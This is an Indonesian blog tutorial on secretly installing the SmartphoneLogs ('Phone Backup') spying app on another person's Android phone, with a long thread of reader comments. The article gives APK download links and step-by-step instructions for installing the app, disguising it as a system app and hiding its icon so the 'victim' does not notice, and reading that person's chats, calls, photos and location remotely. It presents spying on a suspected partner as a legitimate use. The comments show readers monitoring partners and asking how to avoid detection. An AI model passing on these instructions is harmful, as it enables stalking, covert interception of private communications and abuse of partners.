Cara Menyadap HP Android Menggunakan Smartphonelogs

Saturday, November 12th 2016.

 

Tahukah Anda bahwa sekarang ini ada cara menyadap hp android menggunakan smartphonelogs. Bukan untuk mengajarkan kepada Anda tindak kejahatan, penyadapan ini juga bisa digunakan untuk hal positif. Salah satunya adalah memantau pergaulan anak. Mengingat perkembangan zaman yang semakin canggih, Anda sebagai orang tua tidak boleh kalah update dengan anak. Pasalnya, teknologi yang modern terutama ponsel bisa memberikan dampak baik dan juga buruk kepada anak. Tergantung dari bagaimana mereka menyikapi keberadaan teknologi tersebut. Tak hanya itu, menyadap ponsel juga bisa membantu Anda yang sedang curiga dengan pasangan. Tidak untuk meneror atau melakukan tindakan tidak menyenangkan, penyadapan ini bisa dilakukan agar Anda bisa menilai pasangan secara real. Apakah pasangan Anda adalah tipe yang setia atau bukan.

 

Seperti yang diketahui, smartphone Android memiliki sistem yang sifatnya terbuka. Keuntungan inilah yang dimanfaatkan oleh segelintir orang untuk melakukan penyadapan ponsel. Apalagi semakin berjalannya waktu membuat banyak orang berinovasi membuat aplikasi khusus yang diperuntukkan untuk menyadap handphone. Hanya saja, perlu diingatkan kembali bahwa cara menyadap hp android menggunakan smartphonelogs adalah cara yang ilegal dan tidak boleh dimanfaatkan untuk tindakan kejahatan. Sebab penyadapan pada dasarnya adalah suatu tindak kriminal, dimana pelakunya dapat terkena sanksi yang berat. Maka dari itu, Anda yang ingin mengikuti tutorial ini sebaiknya hanya menggunakannya untuk keperluan yang mendesak dan tidak merugikan orang lain.

 

apa itu smartphonelogs

apa itu smartphonelogs

 

Tutorial terkait penyadapan menggunakan aplikasi ini tak hanya bisa menyadap histori pesan sms, BBM, Whatsapp dan percakapan telepon saja melainkan hampir semua jenis percakapan bisa diketahui termasuk Facebook Massenger, email, KakaoTalk, Line dan lain sebagainya. Bahkan, percakapan suara, teks, pesan gambar pun bisa disadap menggunakan cara ini. Canggihnya, adapula fitur terbaru yang memungkinkan penyadap untuk melihat riwayat penjelajah browser dan bookmark apa saja yang pernah dibuka atau disimpan pengguna pada ponselnya. Tak hanya bisa diterapkan pada smartphone Android, cara penyadapan ini juga bisa dilakukan pada ponsel basis lainnya seperti iPad, iPhone, dan Windows Phone.

 

Apa yang Dimaksud dengan Aplikasi Smartphonelogs?

 

Kebanyakan orang mungkin tidak mengenal apa yang dimaksud dengan cara menyadap hp android menggunakan smartphonelogs. SmartphoneLogs merupakan arsip yang kemudian mengenkripsi semua percakapan dalam pesan teks atau SMS, telepon, pemberitahuan, foto,  bookmark browser dan lain sebagainya ke cloud. Dimana data-data tersebut bisa Anda akses dari perangkat lain dimanapun dan kapanpun seperti perangkat Android, iPad, perangkat iPhone, Windows Phone dan lain sebagainya.

 

Aplikasi smartphonelog ini tidak akan bisa Anda temukan di Playstore. Sehingga Anda perlu mengunduhnya melalui pihak ketiga. Smartphonelog ini memiliki berbagai fitur menarik, beberapa diantaranya adalah fitur memantau penggunaan internet (history dan Bookmark), menyadap Whatsapp, Line, Viber, KakaoTalk, pesan Facebook Messenger, WeChat, Facebook, dan semua aplikasi lainnya. Tak hanya itu, aplikasi ini juga bisa memantau pesan skype, Email gmail, log panggilan, dan pesan teks. Aplikasi ini juga memungkinkan Anda untuk melacak lokasi ponsel yang disadap, mengakses semua foto dan video yang ada di Gallery.

 

Menariknya, ikon aplikasi ini tidak akan terlihat dan terdeteksi. Bahkan, tidak pula memunculkan notifikasi pada ponsel. Sehingga korban yang disadap tidak akan mengetahui bahwa dirinya sedang dipantau. Dengan menggunakan cara menyadap hp android menggunakan smartphonelogs ini, Anda dapat melacak ponsel dan menyimpan cadangan data di dalamnya jika dicuri atau hilang secara tidak sengaja. Pihak yang mencuri ponsel tersebut tidak akan sadar ataupun curiga bahwa ponsel yang diambil sudah diterapkan aplikasi Phone Setting/Phone Backup yang merupakan aplikasi penyadap ponsel Android.

 

Inilah Cara Menyadap HP Android Menggunakan Smartphonelogs

 

  1. Unduh dan pasang

Download aplikasi smartphonelogs pada laman resminya di internet atau lewat link http://www.mediafire.com/file/dtkcmdnjphdln0q/app5.apk (versi 5). Karena proses pengunduhannya tidak menggunakan play store, maka ada beberapa hal yang perlu Anda lakukan terlebih dahulu. Ketika aplikasi di buka, Anda akan di arahkan pada pengaturan Aplikasi yang Terblokir. Klik saja tanda centang pada opsi unknown sources atau sumber tidak diketahui. Ingat, aplikasi ini diunduh dan dipasang pada ponsel yang akan disadap. Ukuran filnya juga kecil yaitu hanya sebesar 1,43 MB. Korban yang disadap tidak akan curiga karena aplikasi smartphonelogs yang diinstal akan berubah namanya menjadi Phone Setting/Phone Backup. Namanya diubah agar pemilik ponsel tidak mencurigai bahwa ponselnya sedang dipantau.

 

buka website smartphonelogs

buka website smartphonelogs

 

download and install now

download and install now

 

pasang

pasang aplikasi di android anda

 

  1. Pengaturan

Cara menyadap hp android menggunakan smartphonelogs selanjutnya, Anda akan diarahkan untuk mengisi Usename, password dan juga email yang akan digunakan untuk memantau ponsel. Untuk username bisa Anda isi sesuka hati, termasuk dengan password yang akan digunakan tapi jangan sampai lupa password dan username. Sementara email yang diisi harus menggunakan akun gmail. Tujuan dari mengisi username, password serta email ini adalah agar Anda bisa memantau semua percakapan yang ada di dalam ponsel dimanapun dan kapanpun menggunakan perangkat lain. Perlu diingat bahwa username serta password yang digunakan tidak boleh pernah digunakan orang lain dan harus berbeda dengan yang sebelumnya sudah pernah ada. Sebab ketika Anda menggunakan username serta password orang lain atau yang sudah pernah mendaftar, maka saat tombol Active notification backup ditekan akan gagal dan muncul notifikasi bahwa username atau password tersebut sudah digunakan. Apabila Anda sudah mengisi username dan lain-lain, maka langkah selanjutnya adalah mengklik opsi Active notification backup.

 

isi username, password dan email

isi username, password dan email, klik aktifkan pemberotahuan backup, ok.

 

aktifkan notofikasi service

aktifkan notifikasi service, ok.

 

  1. Save

Apabila sudah selesai, langkah selanjutnya terkait cara menyadap hp android menggunakan smartphonelogs ini adalah mengklik opsi Save and Hide this app. Setelah menekan opsi tersebut, menu aplikasi smarphonelogs tidak akan terlihat. Dimana aplikasi ini akan terpasang pada sistem ponsel dengan nama lain yaitu Phone Settings/Phone Backup. Jadi jika Anda ingin mengetahui apakah ponsel dalam keadaan disadap atau tidak, bisa masuk ke menu manajer aplikasi dan cari aplikasi Phone Setting/Phone Backup. Jika ada, maka selama ini ponsel Anda sedang disadap. Cara menghapusnya mudah, sama seperti menghapus aplikasi terunduh lainnya di smartphone. Jika aplikasi tersebut sudah terhapus, maka tidak akan ada lagi yang bisa menyadap Anda.

 

cek jika setuju dengan kebijakan privasi dan ketentuan pengguna msarthphonelogs

cek jika setuju dengan kebijakan privasi dan ketentuan pengguna smartphonelogs, kemudian klik menyimpan dan mengkatifkan phone backup.

 

  1. Hasil penyadapan

Setelah berhasil mengunduh dan memasang aplikasi smartphonelogs pada ponsel korban, langkah selanjutnya adalah melihat hasil penyadapan. Cara menyadap hp android menggunakan smartphonelogs adalah Anda masuk ke laman web smartphonelogs, bisa menggunakan PC ataupun ponsel. Kemudian pada bagian pojok kanan atas, akan terlihat menu login. Anda masukkan username serta password yang sebelumnya sudah pernah dibuat pada ponsel korban yang akan disadap. Apabila password yang dibuat lupa, Anda bisa melakukan recovery password melalui email yang digunakan ketika registrasi. Terakhir, Anda bisa melihat sebagian percakapan yang dilakukan pada ponsel yang disadap.

 

buka website smartphonelogs dan login

buka website smartphonelogs dan login

 

sekarang anda bisa melihat pesan, photo, tek & rekaman panggilan dll.

sekarang anda bisa melihat pesan, photo, log & rekaman panggilan dll.

 

Ya, hanya sebagian saja fitur yang bisa ditampilkan. Untuk dapat menikmati semua fitur anda harus membayar paket premium membership (text messsages, call historys, location, photos and call recordings) dan paket layanan perpesanan (Facebook messages, BBM, Whatsapp, Viber, Line, KakaoTalk, WeChat, Skype, Gmail emails dan layanan perpesanan lainnya). Anda bisa menggunkan jasa pembayaran smartphonelogs dengan harga 205rb perpaket perbulan atau 430rb perpaket per-3 bulan jika kesulitan untuk membayar sendiri atau belum mempunyai kartu kredit/akun paypal. Perlu diingatkan kembali bahwa Anda harus menggunakan aplikasi ini untuk keadaan terdesak saja, bukan untuk tindakan kriminal. Demikian ulasan mengenai cara menyadap hp android menggunakan smartphonelogs, semoga bermanfaat.

 

Update Baru:

  • Smartphonelogs baru saja merilis versi baru (versi 8) di https://phonebackup.online. Anda dapat menginstal aplikasi tersebut langsung dari Play Store dengan nama “Phone Backup” atau dengan men-download file APK (versi 8) di sini: http://www.mediafire.com/file/brp5ayen9hbejr9/app8.apk
  • Jika Anda meng-upgrade dari versi lama ke versi baru, Anda mungkin perlu kembali memasukkan username / password Anda saai ini ketika proses instalasi.
  • Setelah instalasi, Aplikasi tidak otomatis tersembunyi. Anda dapat menyembunyikan ikon aplikasi untuk tujuan keamanan di halaman “Edit perangkat” setelah Anda log-in ke phonebackup.online kemudian ceklis “hide icon” dan klik “update”.

 

  1. Kohaku - Palangkaraya

    Apk ini sudah tidak ada di playstore, dan sekarang menggunakan pihak ketiga pun tidak bisa diinstal, apakah ada solusinya kak ???
    Karena ini apk lebih bagus dibanding apk lain

    18/08/2020
  2. Yup - jakarta

    aplikasi ini sudah dihapuskah dari playstore?

    14/07/2020
  3. Vanni - Jakarta

    Kalo aplikasi ini terhapus di hp yg di sadap gimana caranya biar bisa tetap sadap hp korban

    04/06/2020
  4. irfanwahyunanto - kotabaru-kalsel

    kalo buat ngesadaab hp fitur bisa gak min, gini lho hp dia itu smartfren tapi modelnya fitur/hp jadoel
    Mohon penceraannya

    26/04/2020
  5. mann - Jaksel

    sms, WA dari HP nya tidak muncul,,,kalau dulu tahun 2018 muncul

    17/01/2020
  6. Fitriliwers - Flores timur

    Mau nanya saya sudah trasnfer kepaypal ntk pesan dan log sebesar 600.000
    Knapa munculnya data lama
    Mohon penjelasannya

    14/10/2019
  7. ahmad s - banjarmasin

    saya sudah gunakan smartphonelogs berbayar ( paket 3 bln ). Namun untuk pesan yang dari si target kok tidak tampil ya, bagaimana cara menampilkannya ? mohon bantuannya .. terima kasih.

    30/09/2019
  8. BAMBANG - WONOGIRI

    kenapa semua chat kok nggak bisa muncul..
    kalau membayar bagaimana cara bayarnya

    10/09/2019
  9. Aprizal - Bengkulu

    Saya mau nnya kenapa semua pesan nya di whatsap ataupun message atau SMS nya ngx bisa di tampilkan semua,bagaimana cara nya,tlong petunjuk nya gan?

    26/05/2019
  10. Rahma - Banjar

    Min kok chat whatshap nya gak ada yg masuk kenapa ya???
    Padahal sms n browser bisa masuk
    Tolong bantuannya

    14/05/2019
  11. Eko -

    Gak komplit dan update hasil lognya

    05/05/2019
  12. Noldykm - Pohuwato

    Cara bayar g mana..?

    30/03/2019
  13. Septy -

    Ohh jadi gini , klo cara buka sadapnya gmna ?? Kriminal banget !!

    08/01/2019
  14. Jaw - Jakarta

    Dulu saya sudah punya akun dan akun tersebut masih terpasang di hp milik korban tapi saya lupa alamat email& password ny apakah bisa di bantu

    01/12/2018
  15. franco - ende

    ribet

    29/11/2018
  16. inmino - seoul

    hallo min, saya coba pake aplikasi smartphonelogs tapi kenapa percakapan di IG,LINE,DAN KAKAOTALK g bisa di lihat semua. tolong bantuannnya segera… terimakasi

    09/11/2018
  17. Natalie - Tangerang

    Cara byr smarphonelog y bgmn y?? And klau udh byr yg lama msh bs dipke ap gk,?? Q hrs bkin yg baru lg, tlg penjelasan y

    16/10/2018
  18. Nizam - Bandun

    Ok

    20/09/2018
  19. Gladys - Donggala

    Sy mau tny, kmrn sy berlangganan pake kartu kredit mandiri dan tertulis di account statusnya valid sampe tgl 18-10-18.. tapi stlh dibuka hari ini tnyt ga bs keliatan, yg terlihat cm yg kmrn aja pdal sdh dibyr dan statusnya valid..tlng bantuannya

    19/09/2018
  20. fatriat - kotabaru. kalsel

    nomer yang bisa dihubungi

    26/08/2018
  21. Zali - Kuala lumpur

    Selapas kemaskini..sy tidak dapat melihat mesej2 baru..sedangkan penolakan kredit telah dilakukan..sy rasa ini amat teruk app smartphonelogs ini..mahu keuntungan saja..dan bila tidak kemaskini pun tidak boleh lihat mesej2 terbaru..saya sudah guna app ni hampir setahun..tp tidak memuaskan bagi saya..saya pun telah email di smartphonelogs tapi tiada tindakan.sangat kecewa..

    21/05/2018
  22. aji - jogjakarta

    saya merasa gak pernah ngedaftar di aplikasi ini, tapi kok muncul tagihan di billing kartu ku ya…bagaimana cara membatalkan atau membloknya..? saya merasa gak pernah pakai kok suruh bayar..

    25/04/2018
  23. Hari - Jawa Timur

    akhir2nya pasti disuruh jadi membersip…prabayar…wis lagu lama…ndk niat brow…

    25/04/2018
  24. Wulan - Pekalongan

    Kenapa pas saya memasukan nma pengguna dan password slh trs.mohon solusinya

    20/04/2018
  25. Rosi - Malaysia

    Saya dh pasang smartphone backup..dan buat langganan..tpi mula2 ok..smua dapat baca..tpi skrg tk blih baca semua..akaun masih aktif.mgkn yang kena sadap dh blok saya..bagaimana harus saya buat?

    16/04/2018
  26. Megawati - Sumenep

    Min, ini aq daftar yang logs.. Tapi koq massage (pesan) gk kebaca.. Dan di logs juga cuma keluar panggilan2 saja.. Yang pesan gak ada..

    03/04/2018
  27. Ani - Tangerang

    Knp skrng tidak bisa merekam.tdk bsa d hapus jg

    02/04/2018
  28. ice - depok

    Mengapa phone backup gk bisa lagi ke tanggal hari ini stack di tanggal kemarin

    27/03/2018
  29. Aida - Pontianak

    Gimana cara bayar phone backup

    05/03/2018
  30. Kolam - Lamandau

    Gk bisa di buka gk bisa di liat.ini bnr apa gk.dan kmetar jga gk ada yg jwb.

    12/02/2018
  31. juanda ahmad - palangkaraya

    Kenapa cuma bisa liat chet orang,ga bisa liat chet yang kita sadap,bantu dong biar bisa lebih mantap

    03/02/2018
  32. fimiz - bndar seri begwan

    knpa s2 tidak mahu didownlod apl ,

    30/01/2018
  33. elis - samarinda

    bisa si smua klihtn. tp ko cm 2 bln aj min. mhon ptujuk jln yg bnr ya…

    25/01/2018
  34. Nuraeni - Jakarta

    Paraah bgt bayar mahal” gk bisa buka backup ,cara menonaktifkan y gmna min,karna saya daftar pke kartu kredit,takut ya tiap bulan berlangganan,kalo bisa backup dan di gunakan gpp lah,ini bayar mahal” gk bisa buka apa” paayaaah

    21/01/2018
  35. Nuraeni - Jakarta

    Cuman bisa 1 hari saja untuk backup ya,knpa gk kebuka histori berikutbya,saya coba untuk berlangganan bayar / purbulan tapi tetep gk bisa backup lg ,tlong jelaskan knpa cumn bisa backup 1 hari saja

    21/01/2018
  36. widuri - surabaya

    kenapa cmn bisa sehari aja trus ga bisa lihat apa2 lagi, apa hrs bayar ? gmn caranya ?

    19/01/2018
  37. erna - air molek

    Maaf sya mau tnya. Untuk wa fb dll kok gk bsa trlihat ya?
    Itu bgaimna cranya

    10/01/2018
  38. nokini - tasikmalaya

    Kak itu gmana yaa pesan nya g langsung masuk ke back up’y..?!

    25/12/2017
  39. Yanti -

    Mas mbak…saya udah unsubscribe tapi masih saja kena bills nya. Saya pake kartu kredit. saya dah email ke penyedia layanannya..blm di balas..ada yang ngalamin kaya aku ga? tolong bantuannya

    23/11/2017
  40. Ayu - Purwakarta

    bagaimana caranya mengatasi hp kita yg disadap melalui aplikasi ini?

    20/11/2017
  41. Aditya - Yogyakarta

    Whatshapp massanger BBM dll
    Tidak bisa digunakan
    Mohon petunjuk
    Device xiomi note 4
    Tq

    20/11/2017
  42. Elziggy - Solo

    Min saya mohon info
    Saya sudah bayar
    Saya sudah berlanggannan
    Kenapa Whatshapp bb massanger tidak bisa di lihat
    Mohon info sgera
    Urgent

    20/11/2017
  43. endryko - medan

    Klau kt pkai berbayar,apakah msih bs lanjut dengan akun yg lama,atau daftar ulang lg?

    18/11/2017
  44. Aliyan - Bekasi

    min, mau nanya kan saya mau daftar gimana caranya ya, dan di username saya tertulis expaired.. apa kalau saya mendaftar yang berbayar bisa hidup kembali username saya?? tks

    14/11/2017
  45. Toto - Tegal

    Dari awal saya download ko kaga bisa kebuka dih saya.. Tolong penjelasan min

    07/11/2017
  46. Taa - Jogja

    Min, kok chat Wa,line, Facebook, ngga masuk semua ini gimana ?

    29/10/2017
  47. Hery - Ternate

    Mohon dibantu…
    Saya sudah gunakan aplikasi ini selama sebulan dan awalnya lancar, hanya saja beberapa hari terakhir ini saya tidak menerima laporan lagi.sudah 6 hari terakhir ini saya tidak menerima laporan lagi. Mohon dibantu

    28/10/2017
  48. wiwik - batam

    Min tolong kasih tau dong langkah”nya kalo mo bayar

    28/10/2017
  49. Putri bugsu - Kuala lumput

    Maaf,,klo soal byar gaj masalah,,tapi aku dah berhasil buat phone backup,, tapi kok data2 hp aku yg keluar ,,,bukan data2 hp teman ku yg keluar gimana yah cara nya,,mohon info;,,trimksi

    20/10/2017
  50. Rizki - Malang

    Gan mau tnya, aq uda berhasil instal Phone backup. Uda aq isi username password n emailx, tp kok pas mo aktivasi slalu muncul kalimat katax username sedang digunakan? Padahal aq uda ganti berkali-kali loh sampe nama yg nyleneh? Mohon bantuannya

    19/10/2017
  51. manto - bojonegoro

    fullservise nya gk da 24jam, lwat 24jam hanya log paggilan/sms/notifikasi bbm WA dll. untuk lwat 24jam foto dan log recording dah gk bisa update lgi. takutx nnti klo sya dh byar cma mncul sperti yg lwat 24jam & recording(telpon WA dll) tidak muncul kan saya rugi,

    14/10/2017
  52. Star57 - Makassar

    Bagaimana caranya pake 2 nomor..mohon penjelasanya dan bagaimana caranya

    10/10/2017
  53. aryo - semarang

    kok yg bisa disadap cuma sedikit bang minta penjelasan bang, kok di suruh bayar juga

    07/10/2017
  54. safitri86 - makassar

    Knp sms wa dan bbm tdk tersadap ya,mohon infox

    04/10/2017
  55. Adi - Manado

    Knapa aplikasi WA dan sebagian chat tdak tersadap?mohon bantuannya

    02/10/2017
  56. izal - cianjur

    cara mencopot apknya gimana…dan cara menggunakannya saya kurang paham

    29/09/2017
  57. Sudarsono - Jakarta

    View on location map target gak akurat bahkan diam ditempat walaupun target tdk berada ditempat

    27/09/2017
  58. cata - tg.pinang

    bagaimana pendaftaran dan apakah pembayaran bisa lewat atm serta bagaimana kalau ingin berhenti berlanganan, dan apakah ada panduan cara memasangnya. trim.

    25/09/2017
  59. An4log - Soko

    Kalo misa sudah kehiden, cara menampilkan atau membukanya kembali gimana?. Mohon dijawab

    21/09/2017
  60. Saya - Banten

    *apakah notifikasi bisa lebih dari 3 ponsel (3 hp dgn kode yg sama) *kenapa lewat dari 2 bulan tdk terekam lagi chating,foto dan semuanya….mohon penjelasan

    19/09/2017
  61. Saya - Banten

    *Di wa chating target koq tdk muncul,yg muncul hanya chating dr teman itu juga terputus-putus *Di Wa chatingnya dobel2 sangat membosankan *percakapan di Wa & vidio tdk terekam..tolong ya solusinya *Line & Gmail tdk muncul *aplikasinya bisa di dowlod di hp Sony & LG *bagaimana cara bayar pakai paypal

    19/09/2017
  62. Surya - Sidoarjo

    Pak bos saya kan sudah instal phone book stelah itu sukses semua & sudah bisa saya pantau pergerakannya.tpi selama tu dia tau kalau saya sadap.setelah dia mengetahui klu saya sadap.akhirnya sama dia di sofware/merestat ulang semua.nah selama sudah di sofware kan pergerakannya hilang.selama dia sofware apakah bisa di perbaiki.

    11/09/2017
  63. Dutha - Makassar

    Min brati harus instal juga di hp pacar baru bs liat smua percakapannya atw gmn min. Ane udh coba cuma chat ane sendiri klihatan.

    08/09/2017
  64. Diane -

    Bagaimana caranya agar aplikasi ini tidak terdeteksi pada S360 #urgen

    06/09/2017
  65. Abdul - Malang

    ini knpa cma bisa sehari doang lihatnya min?? hari berikutnya dan seterusnya notife ttep kyak pertama buka..mohon sarannya

    05/09/2017
  66. Jatmiko - Sangatta

    Hanya bisa di pakai sehari aja,, setelahnya ga bisa dgn alasan keterbatasan OS,,

    30/08/2017
  67. ahmad saeful - bekasi

    Min,maaf,saya sudah berlangganan sudah lama,tpi sekarang foto dan log call ga bis k buka,knpa ya
    .mohon pencerahanya

    18/08/2017
  68. Ajhoel.GDC - Tangerang

    Dah dicoba sukses,memang cuma2x24 jam aktifnya,esoknya cuma notif aja,sms terpotong,wa bbm line juga bgtu,intinya harus bayar,wajarlah bayar,kalo sewa spy beneran gak seberapa itu….
    Ane coba di xiaomi,kebuka.,tapi kayaknya xiaomi sistem keamananya lebih canggih,sms,wa,dan aktifitas selanjutnya gak akan muncul,blm nyoba kalo bayar sama atau tidak,!!

    16/08/2017
  69. Dafin - Bangkalan

    Sya udah langganan full service 4 hari lancar bisa tp sejak kemaren gak bisa uptodate alias gak bisa baca bbm wa fb sms panggilan kluar masuk. Mohon bantuannya.

    16/08/2017
  70. izmi azizah - pasuruan

    Kenapa hari ini gak ada notif yang masuk? Foto yang tadi juga sudah gabisa kebuka. . Pesan barunya juga gada . . Ini aplikasi sudah mulai berbayar ya

    14/08/2017
  71. fajri - malang

    setelah 3 hari app kadalwarsa,,, harus bayar

    11/08/2017
  72. Riyo - Indramayu

    Kenapa ya saya sudah lakukan tutorial ini tapi tetep aja ngga bisa?
    Tolong info nya

    10/08/2017
  73. deny - bekasi

    Aplikasi boongan sdh dptar di cek mn ad sms poto gk ad pd hal si korban byk sms. Tdk dpt bk

    07/08/2017
  74. anco321 - Batu licin

    Sudah 2 hri ini saya tdak bsa akses smarphonelog…wkt mau msuk selalu situs ini tdk dpt dijangkau…knp ya…

    05/08/2017
  75. Liza tahim - 1

    Bgus smartphonelogs. Tp Knapa bila nk buka wssapp nota bertanda mngatakan perlu root dahulu? Gi mana unt root hp pcar? Adakah apabila root di hp pacar, data pacar akan hilang? Mohon jawab di email ya.

    05/08/2017
  76. Saya mo paket bbm - Cikarang

    Gmn cara bayar ny ga puny kartu kredit

    05/08/2017
  77. juna - medan

    Kok mlm ini gk bs terbuka? (paket/jaringan full). Pa sdng maintanance ya?

    05/08/2017
  78. didik - jawa tengah

    Gi mana yaa lur kock ngak bisa di buka foto dan juga pesen ya setengah setengah

    30/07/2017
  79. doni - padang

    kenapa nga semua fto yg bisa saya liat dari hp korban kenapa hanya sebagian mohon dibikin tutorialnya tg

    30/07/2017
  80. Kasiih - Denpasar

    Bagaimana cra membayar jika tidak mempunyai kartu kredit

    23/07/2017
  81. Dee - Bojonegoro

    Kalau hape yg disadap dibawa ke mekah masi bs di sadap g y

    16/07/2017
  82. Ita - Gresik

    Sy dah coba 1bln lebih tp wa masuk yg tampil. Wa keluar gk tampil. Sy dah berlanggann jg. Recording dobel2n lama. Mengunjak ahir2bulan call n sms gk is terdeteksi. Hny wa sj yg nampak. Lokasi jg gk sesuai.mohon infonya gan. Tq

    16/07/2017
  83. wie - surabaya

    Di WA Chat korban koq ga muncul???yg muncul hanya chat dari temen2 korban. Video tidak muncul. Recording susah, gimana caranya

    12/07/2017
  84. Reni - Ponorogo

    Mau tanya. Kok pas di bagian massage kita lihat chat an bbm nya gak bisa lihat balasannya si korban ya. Tolong di info ke saya. Trimakasi

    10/07/2017
  85. budi - jakarta

    sblm nya enk dpakai. cma skrang ko gk bsa kbca ya. pmbrithuan nya s ydah bner. bgus. cma gk bsa liat isi chat nya. tolong saran nya

    10/07/2017
  86. ANDRES MARINDAR N - Magetan

    Cara menonaktifkan gmn ya gan….

    06/07/2017
  87. amin sunarya - bandung

    Kenapa yah yang saya chatan nya ga ke buka semua cuman keliatan sedikit ?
    Tolong pencerahannya admin
    Terima Kasih

    05/07/2017
  88. Riny - Surabaya

    Sayansudah bayar paket premium message tp kenapa saya g bisa lihat message nya ya ( wa,BBM etc) muncul No upload yet terus.. ini gimana cara kerjanya dan gimana cara agar uang saya kembali percuma bayar tp g bisa menikmati

    22/06/2017
  89. fulan - ternate

    Mau berlangganan tapi gak punya kartu kredit, bgm caranya biar bisa berlangganan?

    21/06/2017
  90. Eji waeji - Ciamis

    Saya sudah daftar sudah bayar juga tapi hasil nyadapnya cuman 2 hari gratis 2 hari yg di bayar padahal sy bayar paket yg sebulan

    21/06/2017
  91. Eyuskiinandaa - Jambi

    Gan,hp saya ilang tp saya ada aplikasi phone backup, phone backup kan mengbackup semua data dihp jadi saya mau mntk imei hp saya soalnya kotak hp nya jg hilang jadi gak ada yg bs di lacak, saya jg gk tau imei nya apa tp saya baca backup data termasuk imei saya jg

    13/06/2017
  92. joko - jawa

    kok skrng gabisa liat notif yah?

    11/06/2017
  93. Candra - Bandung

    Admin kenapa sy udah melakukan pembayaran 2kali masih tetep aja ga bisa dibuka..ketika klik pesan jawabannya pesan belum diunggah.. pembayaran yg pertama dan yg kedua tdk berubah…pesan belum diunggah…apakah aplikasi ini tipu2 ato gimana…

    09/06/2017
  94. Vernandi - Pringsewu

    Apakah aplikasi ini berbayar jika sudah memakainya. Terimakasih

    05/06/2017
  95. Aditya malik - Penajam

    Kenapa pesan terkirimnya tidak bisa terbaca..tolong di bantunya

    31/05/2017
  96. aji - rembang

    gan cara menyadap ponsel target gimana iya??? soalnya ponsel yg sudah di kasih apk kok minta email. kalau emailnya sama di ponsel yg akan menyadap iya

    29/05/2017
  97. ibonk - bekasi

    Hai min, knp notifnya itu saja.. untuk sehari dua hari update, namun untuk hari berikutnya notif yang baru tidak muncul lagi.. harus gimana ya?? Mohon pencerahannya..

    27/05/2017
  98. antmerow - sidoarjo

    kenapa versi 3.6 sudah tidak bias sama sekali padahal pebayaran masih berlanjut otomatis sekarang sama sekali tdk ada berita kenapa jg kalau merilis versi tidak otomatis saja sekarang ada versi 8 1 bulan penuh tdk ada berita terbaru komplai jg tdk ada tanggapan dari smartphonelogs bagaiana supaya bias mendapatkan up date lagi yang menjadi masalah kalau ganti versi 8 jelas tidak bias lokasi jauh di luar pulau bagaimana caranya?

    26/05/2017
  99. Elly - Makassar

    Sy sdh berlangganan. Tp koq data yg muncul cm itu2 sj, yg pd wktu free trial 2 hr. Yg skrg malah gak ada

    24/05/2017
  100. Fatmawaty - KAB. MIMIKA, Timika

    Cara bayar tanpa kartu kredit gmn… ? Soalnya gak punya kartu kredit… mohon infonya…

    14/05/2017
  101. Jajang - Bandung

    gimana caranya berlangganan,apakah bisa menggunakan kartu kredit atau debit kartu ATM, mohon bantuannya

    12/05/2017
  102. natavita - mataram, ntb

    gimana cara berlangganan om? apakah bisa menggunakan ATM atau gimana om. saya kurang paham caranya. mohon bantuannya

    11/05/2017
  103. BOY ANDRE - mataram, NTB

    GIMANA CARA PEMBAYARANNYA AGAR BISA BERLANGGANAN? MOHON INFONYA. MAKASI

    10/05/2017
  104. papa - surabaya

    Saya sudah berlangganan 3 bulan, 1 bulan pertama lancar tp dlm bulan kedua ini Notifikasinya gak muncul bahkan aplikasi yg lama di hp target sudah sy hapus dan saya download ulang tp tetep gak muncul notifikasinya, gmn caranya untuk bisa dapatkan notifikasinya kembali? Mohon penjelasan,, hp korban pake Xiomi not 4x

    05/05/2017
  105. yudi - kolaka

    penting memang tapi pembayaran berbelit2 kadang sudah di bayar dari pemikik akuont merejeknya.

    04/05/2017
  106. Torin - Bandung

    Pak/bu dulu sekali saya bisa menyadap tapi sekarang ngak bisa bagaimana cara pembayarannya mohon dibantu

    02/05/2017
  107. MEY LEE - jambi

    gimana cara berhenti berlangganan smartphonelog, soalnya udah ngga pake aplikasinya tapi ttp kena bayar

    26/04/2017
  108. galengsong - pati

    apakah ada masa aktif di smartphone logs

    21/04/2017
  109. Bang ombink - Medan

    Bagus sich..
    Jalan.tp klo bisa gratis donk mas..hehehe
    Takut ny nnti udah di bayar ttp gg keliatan smw hasil sadapan ny..

    15/04/2017
  110. Jharot - Bksi

    Yess ..saya sudah bisa dan menyadap android pacar ..yeaahh .yess

    11/04/2017
  111. himamulaziz - malang

    kok susah di download ya.susah banget

    08/04/2017
  112. Deni - Papua

    Tolong.. nomor yg bisa dihubungi..

    06/04/2017
  113. Dimas - Malaysia

    Gan…gimana cara mendawnlod kok gak bisa bisa gan

    03/04/2017
  114. komara ndut - jakarta timur

    min klo sudah saya download apa bisa di gunakan/berfungsi saat hp korban offline?
    mohon jawabannya trims.. .

    27/03/2017
  115. jhe - garut

    min,kok cuma bisa buat browser history,sms n tlp saja ya? utk bbm tdk bisa..padahal d artikelnya bisa utk bbm jg?

    24/03/2017
  116. quotes - pandaan

    Min..mau tanya apakah cuma android doang yang bisa di sadap..
    atau bisa enggak menyadap nomernya saja dan apakah kalo kita ingin menyadap hp seseorang.. berarti kita harus memasangkan aplikasi phone backup ke hp yang mau di sadap dan membuat akun juga di situ..? mohon pencerahannya

    23/03/2017
  117. Yudhi - Surakarta

    Kelihatan sih mudah tp prakteknya sulit jg, masih hrs bayar jg yaaa,trus byrnya berapa dan hrs byr MA siapa, MHN dijelaskan yg detail.mksh

    21/03/2017
  118. Rudi hartono - Jakarta

    Gimana cara berlangganan,dan cara pembyaranya?
    Tlg diprjelas supya sy bs brlangganan.
    TQ

    21/03/2017
  119. abd rosyid - surabaya

    Sebelum.na saya pernah mencoba.na dan berhasil cuma tdak semua.na muncul.. dan sekarang saya mau mencoba.na kembali ko gabisa”(ga ada yg muncul) knapa yah?

    21/03/2017
  120. Nizamgile - Hi

    Yoo

    21/03/2017
  121. musee - Bekasi

    Chat,atau masage tidak kunjung uplod dari android knapa ya gan” mohon solusi

    17/03/2017
  122. Nugroho - Yogya

    Cara pembayarannya gimana?

    17/03/2017
  123. harry - jakarta

    Gmn sih aplikasi ini sebener ny susah n rumit

    17/03/2017
  124. chalte - lampung

    sy sudah coba,, dan brhasil.. tapi kenapa gak semuanya pesan dapat dibaca,, seperti WA, kenapa tidak semuany.. katanya keterbatasan OS,, JAWAB ADMIN

    09/03/2017
  125. Amung - Jakarta

    Saya mau langganan satu bulan dulu bisa dibantu TIDAK…makasih

    08/03/2017
  126. resha - depok

